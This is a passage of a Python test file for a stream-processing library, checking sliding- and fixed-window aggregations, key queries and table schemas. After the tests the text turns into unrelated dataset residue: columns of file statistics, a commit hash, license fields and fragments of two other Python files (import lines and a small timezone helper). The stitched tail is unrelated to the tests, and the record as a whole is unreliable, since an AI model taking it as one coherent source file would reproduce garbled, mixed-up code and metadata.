{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28,
'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7,
'number_of_stuff_max_2h': 7, 'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0,
'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36,
'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8,
'number_of_stuff_max_2h': 8, 'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0,
'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9,
'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0,
'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['max', 'min', 'sum', 'count']}}
_assert_schema_equal(schema, expected_schema)
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator('new_aggr', 'col1', ['min', 'max'],
SlidingWindows(['3h'], '10m'))],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 27, 'number_of_stuff_sum_2h': 40, 'number_of_stuff_sum_24h': 55, 'number_of_stuff_min_1h': 8,
'number_of_stuff_min_2h': 6, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 10, 'number_of_stuff_max_2h': 10,
'number_of_stuff_max_24h': 10, 'new_aggr_min_3h': 10, 'new_aggr_max_3h': 10, 'number_of_stuff_avg_1h': 9.0,
'number_of_stuff_avg_2h': 8.0, 'number_of_stuff_avg_24h': 5.0, 'col1': 10}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['sum', 'max', 'min', 'count']},
'new_aggr': {'period_millis': 600000, 'aggregates': ['min', 'max']}}
_assert_schema_equal(schema, expected_schema)
def test_invalid_modify_schema(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15,
'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5,
'number_of_stuff_max_2h': 5, 'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21,
'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6,
'number_of_stuff_max_2h': 6, 'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28,
'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7,
'number_of_stuff_max_2h': 7, 'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0,
'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36,
'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8,
'number_of_stuff_max_2h': 8, 'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0,
'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9,
'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0,
'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['max', 'min', 'sum', 'count']}}
_assert_schema_equal(schema, expected_schema)
other_table = Table(setup_teardown_test, V3ioDriver())
try:
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '24h'], '3m'))],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
controller.await_termination()
except ValueError:
pass
def test_query_aggregate_by_key_sliding_window_new_time_exceeds_stored_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['30m', '2h'], '1m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(hours=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(hours=items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 1}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_query_aggregate_by_key_fixed_window_new_time_exceeds_stored_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
FixedWindows(['30m', '2h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(hours=items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_query_time_exceeds_stored_window_by_more_than_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['30m', '2h'], '1m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(hours=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(days=10)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_query_time_exceeds_stored_window_by_more_than_window(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
FixedWindows(['30m', '2h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 3
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1},
{'col1': 2, 'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_count_30m', 'number_of_stuff_count_2h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(days=10)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 3, 'number_of_stuff_count_30m': 0, 'number_of_stuff_count_2h': 0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_write_to_table_reuse(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
flow = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'], FixedWindows(['30m', '2h']))], table),
NoSqlTarget(table), Reduce([], lambda acc, x: append_return(acc, x))
])
items_in_ingest_batch = 3
expected_results = [
[{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 0},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 1},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2, 'col1': 2}],
[{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 0},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 1, 'col1': 1},
{'number_of_stuff_count_30m': 1, 'number_of_stuff_count_2h': 2, 'col1': 2},
{'col1': 0},
{'number_of_stuff_count_30m': 2, 'number_of_stuff_count_2h': 2, 'col1': 1},
{'number_of_stuff_count_30m': 2, 'number_of_stuff_count_2h': 3, 'col1': 2}],
]
for iteration in range(2):
controller = flow.run()
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=45 * i))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results[iteration]
def test_aggregate_multiple_keys(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'yosi'],
'last_name': ['cohen', 'levi', 'levi'],
'some_data': [1, 2, 3],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30),
t0 - pd.Timedelta(minutes=35)]
}
)
keys = ['first_name', 'last_name']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=['first_name', 'last_name']),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'first_name': 'moshe', 'last_name': 'cohen', 'some_data': 4}, ['moshe', 'cohen'], event_time=test_base_time)
controller.emit({'first_name': 'moshe', 'last_name': 'levi', 'some_data': 5}, ['moshe', 'levi'], event_time=test_base_time)
controller.emit({'first_name': 'yosi', 'last_name': 'levi', 'some_data': 6}, ['yosi', 'levi'], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 1.0, 'first_name': 'moshe', 'last_name': 'cohen', 'some_data': 4},
{'first_name': 'moshe', 'last_name': 'levi', 'some_data': 5},
{'number_of_stuff_sum_1h': 5.0, 'first_name': 'yosi', 'last_name': 'levi', 'some_data': 6}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_read_non_existing_key(setup_teardown_test):
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'yosi'],
'last_name': ['cohen', 'levi', 'levi'],
'some_data': [1, 2, 3],
'time': [test_base_time - pd.Timedelta(minutes=25), test_base_time - pd.Timedelta(minutes=30),
test_base_time - pd.Timedelta(minutes=35)]
}
)
keys = 'first_name'
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, keys='first_name'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'last_name': 'levi', 'some_data': 5}, 'non_existing_key')
controller.terminate()
actual = controller.await_termination()
print(actual[0])
assert 'number_of_stuff_sum_1h' not in actual[0]
def test_concurrent_updates_to_kv_table(setup_teardown_test):
table1 = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
table2 = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
controller1 = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr1', 'attr1', ['sum'], SlidingWindows(['1h'], '10m'))], table1),
NoSqlTarget(table1)
]).run()
controller2 = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr2', 'attr2', ['sum'], SlidingWindows(['1h'], '10m'))], table2),
NoSqlTarget(table2)
]).run()
try:
for i in range(10):
controller1.emit({'attr1': i}, key='onekey', event_time=test_base_time)
controller2.emit({'attr2': i}, key='onekey', event_time=test_base_time)
finally:
controller1.terminate()
controller2.terminate()
controller1.await_termination()
controller2.await_termination()
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['attr1', 'attr2'], table, key='mykey'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'mykey': 'onekey'}, event_time=test_base_time)
controller.terminate()
result = controller.await_termination()
assert result == [{'mykey': 'onekey', 'attr1': 9, 'attr2': 9}]
def test_separate_aggregate_steps(setup_teardown_test):
def map_multiply(x):
x['some_data'] = x['some_data'] * 10
return x
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'first_name': ['moshe', 'yosi', 'katya'],
'some_data': [1, 2, 3],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30),
t0 - pd.Timedelta(minutes=35)]
}
)
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field='first_name', time_field='time'),
AggregateByKey([FieldAggregator("number_of_stuff", "some_data", ["avg"],
SlidingWindows(['1h'], '10m'))], table),
Map(map_multiply),
AggregateByKey([FieldAggregator("number_of_stuff2", "some_data", ["sum"],
SlidingWindows(['2h'], '10m'))], table),
NoSqlTarget(table),
]).run()
controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_avg_1h', 'number_of_stuff2_sum_2h'],
other_table, key=['first_name']),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'first_name': 'moshe'}, ['moshe'], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [{'number_of_stuff2_sum_2h': 11.0, 'number_of_stuff_avg_1h': 5.5, 'first_name': 'moshe'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_write_read_first_last(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=None)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('attr', 'attr', ['first', 'last'], SlidingWindows(['1h'], '10m'))], table),
NoSqlTarget(table)
]).run()
try:
for i in range(10):
controller.emit({'attr': i}, key='onekey', event_time=test_base_time + timedelta(minutes=i))
controller.emit({'attr': i * 10}, key='onekey', event_time=test_base_time + timedelta(hours=1, minutes=i))
finally:
controller.terminate()
controller.await_termination()
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['attr_first_1h', 'attr_last_1h'], table, key='mykey'),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'mykey': 'onekey'}, event_time=test_base_time + timedelta(minutes=10))
controller.emit({'mykey': 'onekey'}, event_time=test_base_time + timedelta(hours=1, minutes=10))
controller.terminate()
result = controller.await_termination()
assert result == [{'mykey': 'onekey', 'attr_first_1h': 0.0, 'attr_last_1h': 9.0},
{'mykey': 'onekey', 'attr_first_1h': 0.0, 'attr_last_1h': 90.0}]
def test_non_existing_key_query_by_key_from_v3io_key_is_list(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
df = pd.DataFrame([['katya', 'green', 'hod hasharon'], ['dina', 'blue', 'ramat gan']], columns=['name', 'color', 'city'])
controller = build_flow([
DataframeSource(df, key_field='name'),
NoSqlTarget(table),
]).run()
controller.await_termination()
controller = build_flow([
SyncEmitSource(),
QueryByKey(["color"], table, key=["name"]),
QueryByKey(["city"], table, key="name"),
]).run()
controller.emit({'nameeeee': 'katya'}, 'katya')
controller.terminate()
controller.await_termination()
def test_multiple_keys_int(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'key_column1': [10, 20], 'key_column2': [30, 40], 'key_column3': [5, 6], 'key_column4': [50, 60],
'some_data': [1, 2],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30)]
}
)
keys = ['key_column1', 'key_column2', 'key_column3', 'key_column4']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=keys),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'key_column1': 10, 'key_column2': 30, 'key_column3': 5, 'key_column4': 50},
key=[10, 30, 5, 50], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 1.0, 'key_column1': 10, 'key_column2': 30, 'key_column3': 5, 'key_column4': 50}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_float_key(setup_teardown_test):
t0 = pd.Timestamp(test_base_time)
data = pd.DataFrame(
{
'key_column2': [5.6, 8.6],
'some_data': [1, 2],
'time': [t0 - pd.Timedelta(minutes=25), t0 - pd.Timedelta(minutes=30)]
}
)
keys = ['key_column2']
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
DataframeSource(data, key_field=keys, time_field='time'),
AggregateByKey([FieldAggregator('number_of_stuff', 'some_data', ['sum'],
SlidingWindows(['1h'], '10m'))],
table, emit_policy=EmitAfterMaxEvent(1)),
NoSqlTarget(table),
]).run()
actual = controller.await_termination()
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h'],
other_table, key=keys),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'key_column2': 8.6},
key=[8.6], event_time=test_base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [{'number_of_stuff_sum_1h': 2.0, 'key_column2': 8.6}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
| 55.272961
| 140
| 0.662061
| 12,610
| 86,060
| 4.051308
| 0.024266
| 0.179772
| 0.291366
| 0.110439
| 0.941688
| 0.924325
| 0.884765
| 0.869654
| 0.850882
| 0.836632
| 0
| 0.064627
| 0.19541
| 86,060
| 1,556
| 141
| 55.308483
| 0.673166
| 0.000918
| 0
| 0.744843
| 0
| 0
| 0.39331
| 0.293412
| 0
| 0
| 0
| 0
| 0.034377
| 1
| 0.023682
| false
| 0.000764
| 0.006875
| 0
| 0.034377
| 0.000764
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5803f0467cd0ad87e2d9e1e643da4ec5ee8afd94
| 131
|
py
|
Python
|
src/kirby_transform/outputs/__init__.py
|
SrzStephen/Kirby-Transform
|
e5acde12b393a56ce390e947ec735d0af3cb9967
|
[
"MIT"
] | 1
|
2020-11-16T01:07:14.000Z
|
2020-11-16T01:07:14.000Z
|
src/kirby_transform/outputs/__init__.py
|
SrzStephen/Kirby-Transform
|
e5acde12b393a56ce390e947ec735d0af3cb9967
|
[
"MIT"
] | 1
|
2020-12-07T10:20:08.000Z
|
2020-12-07T10:20:08.000Z
|
src/kirby_transform/outputs/__init__.py
|
SrzStephen/Kirby-Transform
|
e5acde12b393a56ce390e947ec735d0af3cb9967
|
[
"MIT"
] | null | null | null |
from kirby_transform.outputs.influx2.process import InfluxAPI
from kirby_transform.outputs.timestream.process import TimestreamPush
| 65.5
| 69
| 0.900763
| 16
| 131
| 7.25
| 0.625
| 0.155172
| 0.310345
| 0.431034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.053435
| 131
| 2
| 69
| 65.5
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6afdbce8d072bf5ba6dc765ccbd0505757a1544e
| 132
|
py
|
Python
|
wttime/tests/util.py
|
PJK/wttime
|
5341deacbebf780df62535d92fc94ca1592850f1
|
[
"MIT"
] | 2
|
2020-05-24T19:11:33.000Z
|
2020-05-30T15:46:34.000Z
|
wttime/tests/util.py
|
PJK/wttime
|
5341deacbebf780df62535d92fc94ca1592850f1
|
[
"MIT"
] | null | null | null |
wttime/tests/util.py
|
PJK/wttime
|
5341deacbebf780df62535d92fc94ca1592850f1
|
[
"MIT"
] | 1
|
2020-09-27T15:22:39.000Z
|
2020-09-27T15:22:39.000Z
|
from datetime import datetime
import dateutil.tz as tz
def utc_midnight(y, m, d):
return datetime(y, m, d, tzinfo=tz.tzutc())
| 18.857143
| 47
| 0.712121
| 23
| 132
| 4.043478
| 0.652174
| 0.301075
| 0.064516
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174242
| 132
| 6
| 48
| 22
| 0.853211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
